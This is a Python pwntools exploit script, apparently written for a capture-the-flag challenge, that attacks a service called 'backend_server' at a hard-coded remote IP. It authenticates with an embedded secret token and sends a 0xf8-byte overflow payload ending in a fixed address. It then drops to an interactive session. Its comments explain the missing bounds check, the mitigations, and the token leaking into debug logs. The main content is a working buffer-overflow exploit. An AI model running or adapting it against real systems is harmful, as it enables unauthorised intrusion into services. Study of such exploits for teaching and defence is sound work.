#!/usr/bin/env python
from pwn import *

# Terminal used by pwntools when it opens a gdb window: a horizontal tmux split.
context.terminal = ['tmux', 'splitw', '-h']

# Target binary; its architecture is read from the ELF headers below.
elf = ELF('./backend_server')
context.update(os='linux', arch=elf.arch)

# 'debug' makes pwntools print every byte sent and received on the
# connection, so anything secret that is transmitted (e.g. a token)
# ends up verbatim in the log as well.
context.log_level = 'debug'

# Endpoints for the 'r' (remote) and 'l' (local listener) launch options
# handled further down in the script.
RHOST = "178.128.84.72"
RPORT = 9997
LHOST = "127.0.0.1"
LPORT = 9997
def section_addr(name, elf=elf):
    """Return the load address (``sh_addr``) of section *name* in *elf*.

    ``elf`` defaults to the module-level target binary, bound once at
    definition time.  If the section does not exist, ``get_section_by_name``
    presumably returns ``None`` and the header lookup raises
    AttributeError -- verify against the pwntools/pyelftools version in use.
    """
    section = elf.get_section_by_name(name)
    return section.header['sh_addr']
def dbg(ss):
    """Log the value of the Python expression string *ss* as ``name: 0x...``.

    *ss* is evaluated with ``eval`` in this module's scope, so it must be a
    trusted, developer-written expression such as ``"elf.symbols['main']"``
    -- never a string derived from program or network output.
    """
    value = eval(ss)  # NOTE: eval on a string; only ever pass literal debug expressions
    log.info("{}: 0x{:x}".format(ss, value))
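# --- Launch the target according to the first command-line argument --------
#   r : connect to the remote host (RHOST:RPORT)
#   l : connect to a local listener (LHOST:LPORT)
#   d : run the binary under gdb with the script below
#   a : run the binary locally and attach gdb to it
#   anything else / no argument : run the binary locally
conn = None
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?'  # consume the option argument
if opt in ('r', 'l'):
    # Membership is tested against a tuple, not the string 'rl': with the
    # string form both '' and 'rl' pass the test and then raise KeyError
    # on the dictionary lookup below.
    targets = {'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}
    conn = remote(*targets[opt])
elif opt == 'd':
    # The template below contains no '{}' placeholder, so this address is
    # currently not used by the gdb script; the computation is kept so the
    # behaviour of the original is unchanged.
    start_addr = hex(elf.symbols['main'] if 'main' in elf.symbols else elf.entrypoint)
    gdbscript = """
continue
""".format(start_addr)
    conn = gdb.debug(['./backend_server'], gdbscript=gdbscript)
else:
    conn = process(['./backend_server'])
    # conn = process(['./backend_server'], env={'LD_PRELOAD': ''})
    if opt == 'a':
        gdb.attach(conn)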
# exploit
log.info('Pwning')
# Authentication step.  The token is a secret embedded in the script itself,
# and because context(log_level='debug') is set above it is also echoed to
# the log, so the log output is as sensitive as this file.
token = 'c96ad7c54d14a76b9a940d662b18efa77637c2451d8363aa93159d130f4c712f'
conn.sendlineafter('Token>', token)
# The service asks for a course name repeatedly; the first three answers are
# short filler.  The exchange is order-sensitive: each sendlineafter blocks
# until the matching prompt has been received.
conn.sendlineafter('What is the course name?>', 'hoge')
conn.sendlineafter('What is the course name?>', 'hoge')
conn.sendlineafter('What is the course name?>', 'hoge')
# Fourth answer: 0xf8 filler bytes followed by one 8-byte little-endian value.
# That the same prompt accepts this much input indicates a missing length
# check on the course-name buffer on the server side; which saved slot sits
# at offset 0xf8 is not visible from this script.  0x604070 is a fixed
# absolute address, which only stays meaningful if the binary is not
# position-independent -- a bounded read and PIE/ASLR are the corresponding
# mitigations.
# NOTE(review): 'x' * 0xf8 + p64(...) mixes str and bytes, which raises
# TypeError on Python 3 -- this script assumes Python 2; confirm the
# intended interpreter.
payload = 'x'*0xf8 + p64(0x604070)
conn.sendlineafter('What is the course name?>', payload)
# Menu selection sent without waiting for a prompt; what '3' selects is
# defined by the server, not visible here.
conn.sendline('3')
# Hand the connection over to the operator.
conn.interactive()